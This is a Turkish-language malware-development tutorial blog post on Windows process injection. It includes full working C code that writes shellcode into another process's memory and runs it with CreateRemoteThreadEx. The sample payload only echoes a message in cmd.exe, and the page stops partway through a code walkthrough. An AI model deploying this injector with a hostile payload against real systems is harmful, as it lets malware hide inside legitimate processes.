<!DOCTYPE html>
<html lang="en-gb"><head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">maldev | Process Injection | bekoo&#39;s blog</title>
<meta property="og:title" content="maldev | Process Injection | bekoo&#39;s blog" />
<meta name="twitter:title" content="maldev | Process Injection | bekoo&#39;s blog" />
<meta itemprop="name" content="maldev | Process Injection | bekoo&#39;s blog" />
<meta name="application-name" content="maldev | Process Injection | bekoo&#39;s blog" />
<meta property="og:site_name" content="bekoo&#39;s blog" />

<meta name="description" content="">
<meta itemprop="description" content="" />
<meta property="og:description" content="" />
<meta name="twitter:description" content="" />

<meta property="og:locale" content="en-gb" />
<meta name="language" content="en-gb" />

  <link rel="alternate" hreflang="en-gb" href="http://localhost:1313/posts/process-injection/" title="English" />





    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2023-08-17T00:00:00Z />
    <meta property="article:published_time" content=2023-08-17T00:00:00Z />
    <meta property="og:url" content="http://localhost:1313/posts/process-injection/" />

    
    <meta property="og:article:author" content="bekoo" />
    <meta property="article:author" content="bekoo" />
    <meta name="author" content="bekoo" />
    
    

    

    <script defer type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Article",
        "headline": "maldev | Process Injection",
        "author": {
        "@type": "Person",
        "name": ""
        },
        "datePublished": "2023-08-17",
        "description": "",
        "wordCount":  969 ,
        "mainEntityOfPage": "True",
        "dateModified": "2023-08-17",
        "image": {
        "@type": "imageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "bekoo\u0027s blog"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.130.0">

    

    <link rel="canonical" href="http://localhost:1313/posts/process-injection/">
    <link href="/style.min.d43bc6c79baa87f006efb2b92be952faeedeb1a3ab626c1d6abda52eae049355.css" rel="stylesheet">
    <link href="/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/icons/favicon-16x16.png">
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="/favicon.ico">




<link rel="manifest" href="http://localhost:1313/site.webmanifest">

<meta name="msapplication-config" content="/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">

    
    <link rel="icon" type="image/svg+xml" href="/icons/favicon.svg">

    </head>
<body data-theme = "dark" class="notransition">

<script src="/js/theme.js"></script>

<div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="https://0xbekoo.github.io/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title>Home</title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>

        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li>
                    <a class="menu-link " href="/">
                        Home
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link active" href="/posts/">
                        Posts
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/tags/">
                        Tags
                    </a>
                    
                </li>
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            <a id="mode" href="#">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">maldev | Process Injection</h1>
                
                
                <div class="post-meta">
                    <time datetime="2023-08-17T00:00:00&#43;00:00" itemprop="datePublished"> 17 Aug 2023 </time>
                </div>
                
            </header>
            
    
        
            
        
    
    <details class="toc" open>
        <summary><b>Table of Contents</b></summary>
        <nav id="TableOfContents">
  <ul>
    <li><a href="#nedir-bu-processler">Nedir bu Process&rsquo;ler</a></li>
    <li><a href="#threadler-nedir">Thread&rsquo;ler Nedir?</a></li>
    <li><a href="#process-injection-nedir">Process Injection Nedir?</a></li>
    <li><a href="#kod">Kod</a></li>
  </ul>
</nav>
    </details>
            <div class="page-content">
                <div align="center">
    <img src="../../img/posts/process-injection/main-photo.png">
</div>
<p>Merhabalar bu yazımda maldev alanından Process Injection konusuna değineceğim.</p>
<h2 id="nedir-bu-processler">Nedir bu Process&rsquo;ler</h2>
<p>Kabaca Processler, işletim sistemi tarafından herhangi bir programın yürütülmesi için oluşturulan çalışma birimleridir. Eğer bir program, kullanıcı veya İşletim Sistemi (OS) tarafından çalıştırılmak istenirse, öncelikle İşletim Sistemi tarafından belleğe yüklenir ardından yine İşletim Sistemi tarafından bu programın yürütülmesi için bir process oluşturulur. En sonda ise belleğe yüklenen programın bellek alanı, Process tarafından temsil edilir ve programın içerdiği komutları çalıştırılmaya başlanır.</p>
<p>Arayüz ortamında gördüğünüz herhangi bir programın dosyaları (kabaca program kodları), kullanıcı veya işletim sistemi tarafından çalıştırılmadığı sürece pasif halde olur. Eğer hedef program çalıştırılmak istenirse, önce diskten belleğe aktarılır ardından aktarılan bu kodlar yürütülmeye başlanır. Bu esnada ise program aktif hale gelmiş olur.</p>
<h2 id="threadler-nedir">Thread&rsquo;ler Nedir?</h2>
<blockquote>
<p><i> &ldquo;Bir Process, en basit ifadeyle, yürütülmekte olan bir programdır. Process bağlamında bir veya daha fazla thread çalışır. Thread ise işletim sisteminin işlemci zamanını tahsis ettiği temel birimdir. Bir Thread, başka bir thread tarafından yürütülmekte olan kısımlar da dahil olmak üzere, işlem kodunun herhangi bir bölümünü yürütebilir.&rdquo; </i></p>
</blockquote>
<ul>
<li>Microsoft Learn - Process and Threads</li>
</ul>
<p>Process’lere göre daha hızlı ve hafif olan Thread’ler, kabaca tanımıyla İşletim Sisteminde bağımsız olarak çalışan birimlerdir. Herhangi bir process içerisinde bir veya daha fazla thread olabilir. Dolayasıyla Process’ler, Thread’ler sayesinde birden fazla işi aynı anda yapabilir.</p>
<p>Thread aracılığıyla Process’lerin birden fazla işi aynı anda yapılabileceğinden bahsettim. Bunu biraz daha detaylandıralım. Örneğin bir web tarayacısı düşünün. Bu web tarayıcısının bir thread ile kullanıcının arayüzle etkileşimi yönetilirken diğer thread’ler ile arka planda web sayfaları yüklemek gibi işlemleri aynı anda gerçekleştirebilir. <br/> <br/></p>
<img src="https://miro.medium.com/v2/resize:fit:720/format:webp/1*RVtaQpjRT3f5XXv_5dU5ig.png">
<div align="center">
    <h6>Task Manager aracılığıyla görüntülenen Firefox Process’in Thread’leri (17 tane)</h6>
</div>
<h2 id="process-injection-nedir">Process Injection Nedir?</h2>
<p>Process Injection, bir bilgisayar programının, başka bir çalışmakta olan sürece kod enjekte etme işlemi olarak tanımlanabilir. Bu teknik, genellikle kötü niyetli yazılımlar tarafından sistemlere sızmak veya mevcut süreçlerin kontrolünü ele geçirmek için kullanılır, ancak bazı yasal yazılımlar da bu tekniği çeşitli nedenlerle kullanabilir.</p>
<p>Process Injection süreci genellikle şu adımları içerir:</p>
<ul>
<li>
<p><strong>Hedef Sürecin Seçimi:</strong> Öncelikle, kodun enjekte edileceği hedef süreç seçilir. Bu, işletim sistemi üzerindeki herhangi bir aktif uygulama olabilir.</p>
</li>
<li>
<p><strong>Bellek Rezervasyonu:</strong> Hedef süreç üzerinde, enjekte edilecek kodun saklanacağı bir bellek alanı rezerve edilir.</p>
</li>
<li>
<p><strong>Kodun Yazılması:</strong> Enjekte edilecek kod, bu rezerve edilmiş bellek alanına yazılır. Bu kod genellikle bir DLL (Dinamik Bağlantı Kitaplığı) dosyası olabilir.</p>
</li>
<li>
<p><strong>Kodun Çalıştırılması:</strong> Kodun çalıştırılması için hedef sürecin bellek alanında uygun bir başlangıç noktası belirlenir ve kodun çalışması sağlanır. Bu genellikle bir fonksiyonun veya işlevin çağrılmasıyla yapılır.</p>
</li>
</ul>
<h2 id="kod">Kod</h2>
<p>Github üzerinde paylaştığım örnek kod parçasına <a href="https://github.com/0xbekoo/maldev/blob/main/C/Shellcode-Injection/main.c">buradan</a> erişebilirsiniz.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;Windows.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp"></span>
</span></span><span class="line"><span class="cl"><span class="cm">/* 
</span></span></span><span class="line"><span class="cl"><span class="cm">    cmd /K &#34;echo Shellcode Injection with bekoo&#34;
</span></span></span><span class="line"><span class="cl"><span class="cm">*/</span>
</span></span><span class="line"><span class="cl"><span class="kt">char</span> <span class="n">Shellcode</span><span class="p">[]</span> <span class="o">=</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\xd5\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x4b\x20\x22\x65</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x63\x68\x6f\x20\x53\x68\x65\x6c\x6c\x63\x6f\x64\x65\x20</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x49\x6e\x6a\x65\x63\x74\x69\x6f\x6e\x20\x77\x69\x74\x68</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x20\x62\x65\x6b\x6f\x6f\x22\x00</span><span class="s">&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">argv</span><span class="p">[])</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">&lt;</span> <span class="mi">2</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Usage: .</span><span class="se">\\</span><span class="s">program.exe &lt;PID&gt;&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="n">DWORD</span>       <span class="n">PID</span> <span class="o">=</span> <span class="nf">atoi</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
</span></span><span class="line"><span class="cl">    <span class="n">HANDLE</span>      <span class="n">HandleProcess</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="n">HANDLE</span>      <span class="n">HandleThread</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="n">LPVOID</span>      <span class="n">RemoteBuffer</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">HandleProcess</span> <span class="o">=</span> <span class="nf">OpenProcess</span><span class="p">(</span><span class="n">PROCESS_ALL_ACCESS</span><span class="p">,</span> <span class="n">FALSE</span><span class="p">,</span> <span class="n">PID</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="n">HandleProcess</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Failed to Open Target Process! Error Code: 0x%lx&#34;</span><span class="p">,</span> <span class="nf">GetLastError</span><span class="p">());</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">RemoteBuffer</span> <span class="o">=</span> <span class="nf">VirtualAllocEx</span><span class="p">(</span><span class="n">HandleProcess</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">Shellcode</span><span class="p">),</span> <span class="p">(</span><span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">),</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="n">RemoteBuffer</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Failed to Allocated Memory for DLL! Error Code: 0x%lx&#34;</span><span class="p">,</span> <span class="nf">GetLastError</span><span class="p">());</span>
</span></span><span class="line"><span class="cl">        <span class="nf">CloseHandle</span><span class="p">(</span><span class="n">HandleProcess</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="nf">WriteProcessMemory</span><span class="p">(</span><span class="n">HandleProcess</span><span class="p">,</span> <span class="n">RemoteBuffer</span><span class="p">,</span> <span class="n">Shellcode</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">Shellcode</span><span class="p">),</span> <span class="mi">0</span><span class="p">)))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Failed to write dllPath to Allocated Memory Error Code: 0x%lx&#34;</span><span class="p">,</span> <span class="nf">GetLastError</span><span class="p">());</span>
</span></span><span class="line"><span class="cl">        <span class="nf">CloseHandle</span><span class="p">(</span><span class="n">HandleProcess</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">HandleThread</span> <span class="o">=</span> <span class="nf">CreateRemoteThreadEx</span><span class="p">(</span><span class="n">HandleProcess</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="n">LPTHREAD_START_ROUTINE</span><span class="p">)</span><span class="n">RemoteBuffer</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="n">HandleThread</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Failed to Create Thread! Error Code: 0x%lx</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="nf">GetLastError</span><span class="p">());</span>
</span></span><span class="line"><span class="cl">        <span class="nf">CloseHandle</span><span class="p">(</span><span class="n">HandleProcess</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="nf">WaitForSingleObject</span><span class="p">(</span><span class="n">HandleThread</span><span class="p">,</span> <span class="n">INFINITE</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">CloseHandle</span><span class="p">(</span><span class="n">HandleThread</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">CloseHandle</span><span class="p">(</span><span class="n">HandleProcess</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>Detaylıca göz atalım:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">char</span> <span class="n">Shellcode</span><span class="p">[]</span> <span class="o">=</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\xd5\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x4b\x20\x22\x65</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x63\x68\x6f\x20\x53\x68\x65\x6c\x6c\x63\x6f\x64\x65\x20</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x49\x6e\x6a\x65\x63\x74\x69\x6f\x6e\x20\x77\x69\x74\x68</span><span class="s">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="s">&#34;</span><span class="se">\x20\x62\x65\x6b\x6f\x6f\x22\x00</span><span class="s">&#34;</span><span class="p">;</span>
</span></span></code></pre></div><p>Bu shellcode, cmd.exe&rsquo;yi açarak &ldquo;Shellcode Injection with bekoo&rdquo; yazısını ekrana yazdıran bir shellcode&rsquo;dur. Bu shellcode&rsquo;u hedef process&rsquo;e enjekte edeceğiz.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">argv</span><span class="p">[])</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">&lt;</span> <span class="mi">2</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Usage: .</span><span class="se">\\</span><span class="s">program.exe &lt;PID&gt;&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="n">DWORD</span>       <span class="n">PID</span> <span class="o">=</span> <span class="nf">atoi</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
